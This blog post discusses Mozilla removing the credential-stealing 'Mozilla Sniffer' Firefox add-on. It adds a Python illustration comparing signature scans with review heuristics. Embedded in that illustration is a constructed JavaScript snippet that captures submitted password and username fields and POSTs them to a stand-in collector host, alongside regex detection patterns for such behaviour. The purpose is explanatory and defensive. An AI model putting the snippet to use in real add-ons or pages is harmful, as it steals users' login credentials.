One of the greatest features of the Mozilla Firefox open source web browser is its incredible extensibility by way of add-ons.
Yet, as events this week have shown yet again, Mozilla’s add-on security model is far from secure.
This week Mozilla pulled the Mozilla Sniffer add-on from its add-ons site, as the tool intercepted login data submitted to any website and then sent that data to a remote location.
How does such a malicious piece of software end up in a Mozilla public repository, available for any Firefox user to install?!
In a blog post, Mozilla defends itself, noting that the add-on was in an experimental state, and that all users who installed it should have seen a warning indicating it was unreviewed.
“Unreviewed add-ons are scanned for known viruses, trojans, and other malware, but some types of malicious behavior can only be detected in a code review,” Mozilla stated.
Basic malware scans will not pick up the types of attacks that are most common on the web today, namely cross-site scripting and information-disclosure attacks. As such, I for one am worried, as this isn’t the first time bad add-ons have made it onto the Mozilla add-on site. A similar issue was reported in February as well.
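To make the distinction in Mozilla’s statement concrete, here is an added illustration of my own (not Mozilla’s scanner and not the Sniffer add-on’s code): a hash-based “known malware” check placed beside a crude code-review-style heuristic, both run over two constructed add-on snippets. The snippets, the regexes, the blocklist digest and the `.invalid` host name are all invented for the illustration.

```python
import hashlib
import re

# Constructed sample in the style the post describes: reads submitted login
# fields and ships them off-site. Invented illustration text, not the real
# Mozilla Sniffer add-on.
SUSPECT_ADDON_JS = """
document.addEventListener("submit", function (e) {
  var creds = {};
  var inputs = e.target.querySelectorAll("input[type=password], input[name=user]");
  for (var i = 0; i < inputs.length; i++) creds[inputs[i].name] = inputs[i].value;
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://collector.example.invalid/log");
  xhr.send(JSON.stringify(creds));
});
"""

# Constructed benign sample: only touches the page title.
BENIGN_ADDON_JS = """
document.title = "[" + window.length + "] " + document.title;
"""

# A "known malware" list as a SHA-256 blocklist. Constructed: an arbitrary
# digest that matches neither sample, standing in for a signature database.
KNOWN_BAD_SHA256 = {"0" * 64}


def signature_scan(source: str) -> bool:
    """Return True if the file's hash is on the known-bad list.

    This is all a basic malware scan can do: it catches files it has seen
    before and nothing else. A never-before-seen add-on always passes.
    """
    return hashlib.sha256(source.encode()).hexdigest() in KNOWN_BAD_SHA256


# Behavioural questions a human code reviewer asks: does the script read
# credential fields, and does it send data to some other host?
READS_CREDENTIALS = re.compile(
    r'type\s*=\s*["\']?password|addEventListener\(\s*["\']submit', re.I
)
MAKES_REQUEST = re.compile(r'XMLHttpRequest|fetch\s*\(|navigator\.sendBeacon', re.I)
ABSOLUTE_URL = re.compile(r'https?://[^"\'\s]+', re.I)


def review_heuristics(source: str) -> dict:
    """Mechanical stand-in for the checks a code review performs."""
    findings = {
        "reads_credential_fields": bool(READS_CREDENTIALS.search(source)),
        "makes_network_request": bool(MAKES_REQUEST.search(source)),
        "external_urls": ABSOLUTE_URL.findall(source),
    }
    # Either behaviour alone is common in legitimate add-ons; the combination
    # is what should send the file to a human reviewer.
    findings["flag_for_code_review"] = (
        findings["reads_credential_fields"] and findings["makes_network_request"]
    )
    return findings


def scan_report(source: str) -> dict:
    """Run both checks so the gap between them is visible side by side."""
    return {
        "known_malware": signature_scan(source),
        "review": review_heuristics(source),
    }


if __name__ == "__main__":
    for name, src in (("suspect", SUSPECT_ADDON_JS), ("benign", BENIGN_ADDON_JS)):
        print(name, scan_report(src))
```

The point of running both is the first column of the output: the signature scan passes the suspect snippet just as happily as the benign one, because it has never seen that exact file before, while the reviewer-style check flags it immediately. Heuristics like these are noisy and trivially evaded by obfuscation, which is exactly why Mozilla says the final word belongs to a code review rather than a scanner.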